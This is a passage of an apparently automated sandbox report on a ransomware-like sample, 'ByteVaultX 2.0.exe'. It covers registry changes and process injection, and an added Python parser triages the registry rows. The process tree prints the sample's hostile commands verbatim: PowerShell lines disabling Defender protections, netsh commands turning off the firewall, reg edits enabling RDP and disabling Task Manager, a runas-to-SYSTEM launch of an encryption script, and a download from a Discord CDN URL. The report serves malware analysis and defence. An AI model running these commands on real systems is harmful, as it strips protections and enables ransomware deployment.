Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | SearchUI.exe
Both reads come from SearchUI.exe, the Windows search/Cortana host, not from the sample or any process it spawned.
Processes:
regedit.exe, SearchUI.exe, MicrosoftEdgeCP.exe, browser_broker.exe
Key deleted by regedit.exe (61 keys), all under \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\:
SQM
International\Scripts\14
MenuExt
MINIE
ProtocolExecute\ms-excel
Desktop
International\Scripts\38
PageSetup
TabbedBrowsing
International\Scripts\28
ProtocolExecute\ms-word
International\Scripts\12
International\Scripts\15
International\Scripts\16
International\Scripts\22
International\Scripts\20
International\Scripts\31
LowRegistry\Audio\PolicyConfig\PropertyStore\cc176cd7_0
Toolbar\WebBrowser
Recovery\AdminActive
LowRegistry\Audio\PolicyConfig
Main
International\Scripts\30
LinksBar
SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
International\Scripts\11
International\Scripts\18
International\Scripts\21
Settings
TypedURLs
ProtocolExecute
Zoom
IETld\LowMic
Recovery\PendingRecovery
Security
International\Scripts\35
LowRegistry\DontShowMeThisDialogAgain
Main\FeatureControl
Main\WindowsSearch
LowRegistry\Audio
New Windows
ProtocolExecute\word
International\Scripts\33
Toolbar
Help_Menu_URLs
International\Scripts\26
International\Scripts\7
Desktop\General
International\Scripts\29
International\Scripts\37
International\Scripts\8
International\Scripts\5
Document Windows
International\Scripts\23
International\Scripts\4
International\Scripts\19
International\Scripts\9
InternetRegistry
International\Scripts\13
Suggested Sites
Download
Key created under the same Internet Explorer path (3 keys):
GPU | SearchUI.exe
Main | MicrosoftEdgeCP.exe
Main | browser_broker.exe
The sandbox logs every subkey that disappears, so this list is consistent with regedit.exe removing the user's Internet Explorer key tree wholesale (for instance by importing a .reg file that carries a [-HKEY_CURRENT_USER\...] entry) rather than with 61 separate operations; the command lines of the two regedit.exe instances (PIDs 3616 and 2204 below) are where to confirm that. The three creations are Edge and the search host recreating their own settings afterwards.
Modifies registry class 64 IoCs
Processes:
regedit.exe, MicrosoftEdge.exe
Key deleted by regedit.exe (63 keys), all under \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\:
CLSID\{CAFEEFAC-0016-0000-0142-ABCDEFFEDCBB}\InprocServer32
CLSID\{CAFEEFAC-0016-0000-0158-ABCDEFFEDCBA}\InprocServer32
CLSID\{CAFEEFAC-0018-0000-0223-ABCDEFFEDCBA}
CLSID\{CAFEEFAC-0017-0000-0301-ABCDEFFEDCBA}
Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Schemas
CLSID\{CAFEEFAC-0014-0000-0000-ABCDEFFEDCBB}
CLSID\{CAFEEFAC-0017-0000-0145-ABCDEFFEDCBC}
CLSID\{CAFEEFAC-0018-0000-0357-ABCDEFFEDCBA}
CLSID\{CAFEEFAC-0016-0000-0073-ABCDEFFEDCBB}\InprocServer32
CLSID\{CAFEEFAC-0016-0000-0095-ABCDEFFEDCBA}
CLSID\{CAFEEFAC-0016-0000-0178-ABCDEFFEDCBC}\InprocServer32
CLSID\{CAFEEFAC-0016-0000-0219-ABCDEFFEDCBB}
CLSID\{CAFEEFAC-0017-0000-0092-ABCDEFFEDCBB}\InprocServer32
CLSID\{CAFEEFAC-0017-0000-0267-ABCDEFFEDCBB}\InprocServer32
CLSID\{CAFEEFAC-0018-0000-0037-ABCDEFFEDCBB}
ActivatableClasses\Package\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy
CLSID\{CAFEEFAC-0013-0001-0067-ABCDEFFEDCBA}
CLSID\{CAFEEFAC-0014-0000-0004-ABCDEFFEDCBA}\InprocServer32
CLSID\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBB}\InprocServer32
CLSID\{CAFEEFAC-0017-0000-0079-ABCDEFFEDCBB}
CLSID\{CAFEEFAC-0018-0000-0012-ABCDEFFEDCBA}\InprocServer32
Extensions\ContractId\Windows.ComponentUI\PackageId\Microsoft.MicrosoftEdge_40.15063.0.0_neutral__8wekyb3d8bbwe
CLSID\{CAFEEFAC-0014-0002-0053-ABCDEFFEDCBA}
CLSID\{CAFEEFAC-0016-0000-0073-ABCDEFFEDCBA}
CLSID\{CAFEEFAC-0017-0000-0356-ABCDEFFEDCBC}
CLSID\{CAFEEFAC-0018-0000-0080-ABCDEFFEDCBA}
CLSID\{CAFEEFAC-0018-0000-0111-ABCDEFFEDCBA}\InprocServer32
CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBC}
CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBB}
CLSID\{CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA}
CLSID\{CAFEEFAC-0017-0000-0298-ABCDEFFEDCBA}
CLSID\{CAFEEFAC-0018-0000-0000-ABCDEFFEDCBC}\InprocServer32
CLSID\{CAFEEFAC-0018-0000-0071-ABCDEFFEDCBC}\InprocServer32
CLSID\{CAFEEFAC-0018-0000-0168-ABCDEFFEDCBB}
CLSID\{CAFEEFAC-0014-0002-0044-ABCDEFFEDCBB}
CLSID\{CAFEEFAC-0016-0000-0129-ABCDEFFEDCBA}\InprocServer32
CLSID\{CAFEEFAC-0017-0000-0204-ABCDEFFEDCBB}\InprocServer32
CLSID\{CAFEEFAC-0018-0000-0079-ABCDEFFEDCBC}
CLSID\{CAFEEFAC-0018-0000-0234-ABCDEFFEDCBA}\InprocServer32
CLSID\{CAFEEFAC-0013-0001-0082-ABCDEFFEDCBB}\InprocServer32
CLSID\{CAFEEFAC-0015-0000-0039-ABCDEFFEDCBB}\InprocServer32
CLSID\{CAFEEFAC-0017-0000-0039-ABCDEFFEDCBB}\InprocServer32
CLSID\{CAFEEFAC-0017-0000-0132-ABCDEFFEDCBB}
CLSID\{CAFEEFAC-0018-0000-0014-ABCDEFFEDCBB}
CLSID\{CAFEEFAC-0018-0000-0121-ABCDEFFEDCBC}\InprocServer32
CLSID\{CAFEEFAC-0018-0000-0320-ABCDEFFEDCBA}
Extensions\ContractId\Windows.Launch\PackageId\Microsoft.AccountsControl_10.0.15063.0_neutral__cw5n1h2txyewy\ActivatableClassId
Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery
CLSID\{CAFEEFAC-0013-0001-0092-ABCDEFFEDCBB}\InprocServer32
CLSID\{CAFEEFAC-0016-0000-0218-ABCDEFFEDCBA}
Extensions\ContractId\Windows.BackgroundTasks\PackageId\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\App.AppXw3qcpc7p849541dp39v
CLSID\{CAFEEFAC-0017-0000-0292-ABCDEFFEDCBC}
CLSID\{CAFEEFAC-0017-0000-0228-ABCDEFFEDCBA}\InprocServer32
CLSID\{CAFEEFAC-0018-0000-0358-ABCDEFFEDCBB}
CLSID\{CAFEEFAC-0014-0002-0086-ABCDEFFEDCBB}\InprocServer32
CLSID\{CAFEEFAC-0016-0000-0124-ABCDEFFEDCBB}\InprocServer32
CLSID\{CAFEEFAC-0017-0000-0085-ABCDEFFEDCBA}\InprocServer32
CLSID\{CAFEEFAC-0017-0000-0114-ABCDEFFEDCBC}\InprocServer32
CLSID\{CAFEEFAC-0017-0000-0134-ABCDEFFEDCBA}\InprocServer32
CLSID\{CAFEEFAC-0018-0000-0197-ABCDEFFEDCBA}
CLSID\{CAFEEFAC-0018-0000-0200-ABCDEFFEDCBA}\InprocServer32
CLSID\{CAFEEFAC-0016-0000-0134-ABCDEFFEDCBB}\InprocServer32
CLSID\{CAFEEFAC-0017-0000-0273-ABCDEFFEDCBA}
Set value (int) by MicrosoftEdge.exe (1 value):
\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "262144"
The {CAFEEFAC-00xx-...-ABCDEFFEDCBx} CLSIDs are the family the Java Plug-in uses for its per-version ActiveX registrations, and the remaining entries are Windows app-package registrations in the user's Classes hive; as with the Internet Explorer list above, this reads as regedit.exe clearing out pre-existing user-hive state rather than touching keys the sample created. The single Edge value write is the browser's own in-progress flag and is unrelated to the sample.
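The registry rows in this report, both the Wallpaper writes under "Sets desktop wallpaper using registry" above and the two key-deletion lists, arrive flattened and have to be turned back into something an analyst can count. The Python below is an added example, not part of the sandbox report or of the sample: it parses rows in the report's "<action> <key path> [= "<value>"] <image>" layout, tallies them per image and action, and raises the two findings a triage of this page would want, a write to the per-user Wallpaper value and a bulk deletion under one subtree. The sample rows are constructed by copying entries from this report (three of the fourteen Wallpaper writes, six Internet Explorer deletions, the three key creations, two CLSID deletions and the Edge value write); the five-key bulk threshold and the decision to group deletions per hive are assumptions made for this example.

```python
import re
from collections import Counter

# Constructed sample: rows copied from this report and joined with spaces,
# which is exactly how the page flattens the sandbox's table.
SID = r"\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000"
IE = SID + r"\Software\Microsoft\Internet Explorer"
WALLPAPER_ROW = ("Set value (str) " + SID + r"\Control Panel\Desktop\Wallpaper"
                 r' = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe')
SAMPLE_REG = " ".join([WALLPAPER_ROW] * 3 + [
    "Key deleted " + IE + r"\SQM regedit.exe",
    "Key deleted " + IE + r"\International\Scripts\14 regedit.exe",
    "Key deleted " + IE + r"\MenuExt regedit.exe",
    "Key deleted " + IE + r"\TypedURLs regedit.exe",
    "Key deleted " + IE + r"\Main regedit.exe",
    "Key deleted " + IE + r"\Main\FeatureControl regedit.exe",
    "Key created " + IE + r"\GPU SearchUI.exe",
    "Key created " + IE + r"\Main browser_broker.exe",
    "Key deleted " + SID + r"_Classes\CLSID\{CAFEEFAC-0016-0000-0142-ABCDEFFEDCBB}\InprocServer32 regedit.exe",
    "Key deleted " + SID + r"_Classes\CLSID\{CAFEEFAC-0018-0000-0223-ABCDEFFEDCBA} regedit.exe",
    "Set value (int) " + SID + r"_Classes\Local Settings\Software\Microsoft\Windows"
    r"\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe"
    r'\MicrosoftEdge\Privacy\InProgressFlags = "262144" MicrosoftEdge.exe',
])

ACTIONS = r"Key deleted|Key created|Key opened|Key value queried|Set value \(\w+\)"
# "<action> <key path>[ = "<value>"] <image>": key paths contain spaces
# ("Control Panel", "Internet Explorer"), so the path is matched non-greedily
# and the row is anchored on the trailing image name instead.
ROW_RE = re.compile(r"^(?P<desc>" + ACTIONS + r") (?P<path>\\REGISTRY\\.+?)"
                    r'(?: = "(?P<value>[^"]*)")? (?P<proc>\S+\.exe)$')
SPLIT_RE = re.compile(r"\s*(?=Key deleted |Key created |Key opened |Key value queried |Set value \()")


def parse_registry_events(text):
    """Split flattened report text into rows; return one dict per parsed row."""
    events = []
    for chunk in SPLIT_RE.split(text):
        m = ROW_RE.match(chunk.strip())
        if m:
            events.append(m.groupdict())
    return events


def common_prefix(paths):
    """Longest common key path, compared component-wise, not character-wise."""
    prefix = []
    for comps in zip(*(p.split("\\") for p in paths)):
        if len(set(comps)) != 1:
            break
        prefix.append(comps[0])
    return "\\".join(prefix)


def triage_registry(text, bulk_threshold=5):
    """Return (Counter of (image, action), list of finding dicts)."""
    events = parse_registry_events(text)
    summary = Counter((e["proc"], e["desc"]) for e in events)
    findings = []
    # Finding 1: the per-user wallpaper value being set (ransom-note wallpaper).
    wallpaper = Counter(
        (e["proc"], e["value"]) for e in events
        if e["desc"].startswith("Set value")
        and e["path"].lower().endswith(r"\control panel\desktop\wallpaper"))
    for (proc, value), n in wallpaper.items():
        findings.append({"kind": "wallpaper_set", "process": proc,
                         "value": value, "count": n})
    # Finding 2: many deletions by one image inside one hive; report the subtree.
    # Grouping on the first four components (\REGISTRY\USER\<SID>) keeps the user
    # hive and its _Classes hive apart (assumption made for this example).
    groups = {}
    for e in events:
        if e["desc"] == "Key deleted":
            hive = "\\".join(e["path"].split("\\")[:4])
            groups.setdefault((e["proc"], hive), []).append(e["path"])
    for (proc, _hive), paths in groups.items():
        if len(paths) >= bulk_threshold:
            findings.append({"kind": "bulk_key_deletion", "process": proc,
                             "prefix": common_prefix(paths), "count": len(paths)})
    return summary, findings


if __name__ == "__main__":
    summary, found = triage_registry(SAMPLE_REG)
    for (proc, desc), n in summary.most_common():
        print(f"{n:3d}  {desc:<16} {proc}")
    for f in found:
        print(f)
```

Run against the full report text the same code yields the 14 reg.exe Wallpaper writes as one finding and the 61 Internet Explorer deletions as one bulk finding whose prefix is the Internet Explorer key, which is the shape of the story rather than 75 separate IoCs.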
Runs regedit.exe 2 IoCs
Processes:
regedit.exe, regedit.exe
pid | process
3616 | regedit.exe
2204 | regedit.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe
pid | process (64 entries in report order, consecutive repeats collapsed)
4408 powershell.exe (x3), 1856 powershell.exe (x4), 4408 powershell.exe (x4), 3608 powershell.exe (x4), 4696 powershell.exe (x4), 3556 powershell.exe (x4), 2596 powershell.exe (x4), 3860 powershell.exe (x4), 5032 powershell.exe (x4), 204 powershell.exe (x4), 5004 powershell.exe (x4), 5108 powershell.exe (x4), 4624 powershell.exe (x4), 4344 powershell.exe (x4), 1436 powershell.exe (x4), 4176 powershell.exe (x4), 748 powershell.exe (x1)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
regedit.exe
pid | process
2204 | regedit.exe
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
MicrosoftEdgeCP.exe
pid | process
368 | MicrosoftEdgeCP.exe (x3)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exe, powershell.exe, MicrosoftEdgeCP.exe, MicrosoftEdgeCP.exe, powershell.exe
description | pid | process (64 entries, grouped by pid in report order)
Token enabled by 4408 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
Token enabled by 1856 powershell.exe: SeDebugPrivilege
Token enabled by 5068 MicrosoftEdgeCP.exe: SeDebugPrivilege (x4)
Token enabled by 1856 powershell.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
Token enabled by 4920 MicrosoftEdgeCP.exe: SeDebugPrivilege (x3)
Token enabled by 4408 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege
The bare numbers are privilege LUIDs the sandbox has no name for: 33 is SeIncreaseWorkingSetPrivilege, 34 SeTimeZonePrivilege, 35 SeCreateSymbolicLinkPrivilege and 36 SeDelegateSessionUserImpersonatePrivilege (the values in winnt.h). Read with the named entries, each PowerShell burst walks the privileges in ascending LUID order, which is the footprint of a routine that enables every privilege on the calling token rather than a targeted request for SeDebugPrivilege. Enabling SeDebug, SeLoadDriver, SeTakeOwnership, SeBackup and SeRestore can only succeed on a full administrator token, so if these calls succeeded the PowerShell instances were running elevated; the sandbox records the request, not its result. The Edge content processes (5068, 4920) request only SeDebugPrivilege, which is ordinary for that browser.
Suspicious use of SetWindowsHookEx 9 IoCs
Processes: MicrosoftEdge.exe, MicrosoftEdgeCP.exe, MicrosoftEdgeCP.exe, SearchUI.exe
pid | process
2756 | MicrosoftEdge.exe
368 | MicrosoftEdgeCP.exe
5068 | MicrosoftEdgeCP.exe
368 | MicrosoftEdgeCP.exe
3024 | SearchUI.exe
3024 | SearchUI.exe
3024 | SearchUI.exe
3024 | SearchUI.exe
3024 | SearchUI.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes: ByteVaultX 2.0.exe, ByteVaultX 2.0.exe, cmd.exe, MicrosoftEdgeCP.exe, powershell.exe
description | pid | process | target process
PID 4112 wrote to memory of 3040 | 4112 | ByteVaultX 2.0.exe | ByteVaultX 2.0.exe
PID 4112 wrote to memory of 3040 | 4112 | ByteVaultX 2.0.exe | ByteVaultX 2.0.exe
PID 3040 wrote to memory of 4408 | 3040 | ByteVaultX 2.0.exe | powershell.exe
PID 3040 wrote to memory of 4408 | 3040 | ByteVaultX 2.0.exe | powershell.exe
PID 3040 wrote to memory of 168 | 3040 | ByteVaultX 2.0.exe | netsh.exe
PID 3040 wrote to memory of 168 | 3040 | ByteVaultX 2.0.exe | netsh.exe
PID 3040 wrote to memory of 4508 | 3040 | ByteVaultX 2.0.exe | runas.exe
PID 3040 wrote to memory of 4508 | 3040 | ByteVaultX 2.0.exe | runas.exe
PID 3040 wrote to memory of 2792 | 3040 | ByteVaultX 2.0.exe | cmd.exe
PID 3040 wrote to memory of 2792 | 3040 | ByteVaultX 2.0.exe | cmd.exe
PID 2792 wrote to memory of 780 | 2792 | cmd.exe | reg.exe
PID 2792 wrote to memory of 780 | 2792 | cmd.exe | reg.exe
PID 2792 wrote to memory of 2748 | 2792 | cmd.exe | reg.exe
PID 2792 wrote to memory of 2748 | 2792 | cmd.exe | reg.exe
PID 2792 wrote to memory of 3776 | 2792 | cmd.exe | reg.exe
PID 2792 wrote to memory of 3776 | 2792 | cmd.exe | reg.exe
PID 2792 wrote to memory of 4520 | 2792 | cmd.exe | reg.exe
PID 2792 wrote to memory of 4520 | 2792 | cmd.exe | reg.exe
PID 2792 wrote to memory of 1856 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 1856 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 4408 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 4408 | 2792 | cmd.exe | powershell.exe
PID 368 wrote to memory of 4920 | 368 | MicrosoftEdgeCP.exe | MicrosoftEdgeCP.exe
PID 368 wrote to memory of 4920 | 368 | MicrosoftEdgeCP.exe | MicrosoftEdgeCP.exe
PID 368 wrote to memory of 4920 | 368 | MicrosoftEdgeCP.exe | MicrosoftEdgeCP.exe
PID 368 wrote to memory of 4920 | 368 | MicrosoftEdgeCP.exe | MicrosoftEdgeCP.exe
PID 2792 wrote to memory of 3608 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 3608 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 4696 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 4696 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 3556 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 3556 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 2288 | 2792 | cmd.exe | netsh.exe
PID 2792 wrote to memory of 2288 | 2792 | cmd.exe | netsh.exe
PID 2792 wrote to memory of 4640 | 2792 | cmd.exe | netsh.exe
PID 2792 wrote to memory of 4640 | 2792 | cmd.exe | netsh.exe
PID 2792 wrote to memory of 2292 | 2792 | cmd.exe | netsh.exe
PID 2792 wrote to memory of 2292 | 2792 | cmd.exe | netsh.exe
PID 2792 wrote to memory of 2608 | 2792 | cmd.exe | netsh.exe
PID 2792 wrote to memory of 2608 | 2792 | cmd.exe | netsh.exe
PID 2792 wrote to memory of 1540 | 2792 | cmd.exe | netsh.exe
PID 2792 wrote to memory of 1540 | 2792 | cmd.exe | netsh.exe
PID 2792 wrote to memory of 2672 | 2792 | cmd.exe | netsh.exe
PID 2792 wrote to memory of 2672 | 2792 | cmd.exe | netsh.exe
PID 2792 wrote to memory of 4608 | 2792 | cmd.exe | netsh.exe
PID 2792 wrote to memory of 4608 | 2792 | cmd.exe | netsh.exe
PID 2792 wrote to memory of 2596 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 2596 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 3860 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 3860 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 5032 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 5032 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 204 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 204 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 5004 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 5004 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 5108 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 5108 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 4624 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 4624 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 4344 | 2792 | cmd.exe | powershell.exe
PID 2792 wrote to memory of 4344 | 2792 | cmd.exe | powershell.exe
PID 4344 wrote to memory of 5104 | 4344 | powershell.exe | cmd.exe
PID 4344 wrote to memory of 5104 | 4344 | powershell.exe | cmd.exe
Processes
- (depth 1) C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
  "C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
  - Suspicious use of WriteProcessMemory
  PID:4112
- (depth 2) C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
  "C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
  - Checks computer location settings
  - Loads dropped DLL
  - Drops desktop.ini file(s)
  - Suspicious use of WriteProcessMemory
  PID:3040
- (depth 3) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4408
- (depth 3) C:\Windows\SYSTEM32\netsh.exe
  netsh advfirewall set allprofiles state off
  - Modifies Windows Firewall
  PID:168
- (depth 3) C:\Windows\SYSTEM32\runas.exe
  runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"
  PID:4508
- (depth 3) C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "
  - Suspicious use of WriteProcessMemory
  PID:2792
- (depth 4) C:\Windows\system32\reg.exe
  reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
  PID:780
- (depth 4) C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
  PID:2748
- (depth 4) C:\Windows\system32\reg.exe
  reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
  PID:3776
- (depth 4) C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
  PID:4520
- (depth 4) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1856
- (depth 4) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4408
- (depth 4) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3608
- (depth 4) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
  - Suspicious behavior: EnumeratesProcesses
  PID:4696
- (depth 4) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3556
- (depth 4) C:\Windows\system32\netsh.exe
  netsh firewall set opmode disable
  PID:2288
- (depth 4) C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode=DISABLE
  PID:4640
- (depth 4) C:\Windows\system32\netsh.exe
  netsh advfirewall set currentprofile state off
  - Modifies Windows Firewall
  PID:2292
- (depth 4) C:\Windows\system32\netsh.exe
  netsh advfirewall set domainprofile state off
  - Modifies Windows Firewall
  PID:2608
- (depth 4) C:\Windows\system32\netsh.exe
  netsh advfirewall set privateprofile state off
  PID:1540
- (depth 4) C:\Windows\system32\netsh.exe
  netsh advfirewall set publicprofile state off
  PID:2672
- (depth 4) C:\Windows\system32\netsh.exe
  netsh advfirewall set allprofiles state off
  - Modifies Windows Firewall
  PID:4608
- (depth 4) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2596
- (depth 4) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
  - Suspicious behavior: EnumeratesProcesses
  PID:3860
- (depth 4) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5032
- (depth 4) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
  - Suspicious behavior: EnumeratesProcesses
  PID:204
- (depth 4) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
  - Suspicious behavior: EnumeratesProcesses
  PID:5004
- (depth 4) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
  - Suspicious behavior: EnumeratesProcesses
  PID:5108
- (depth 4) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  PID:4624
- (depth 4) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4344
- (depth 5) C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
  PID:5104
- (depth 6) C:\Windows\system32\reg.exe
  reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
  PID:3928
- (depth 6) C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
  PID:1304
- (depth 6) C:\Windows\system32\reg.exe
  reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
  PID:3652
- (depth 6) C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
  PID:3956
- (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1436
- (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4176
- (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
  - Suspicious behavior: EnumeratesProcesses
  PID:748
- (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
  PID:4356
- (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
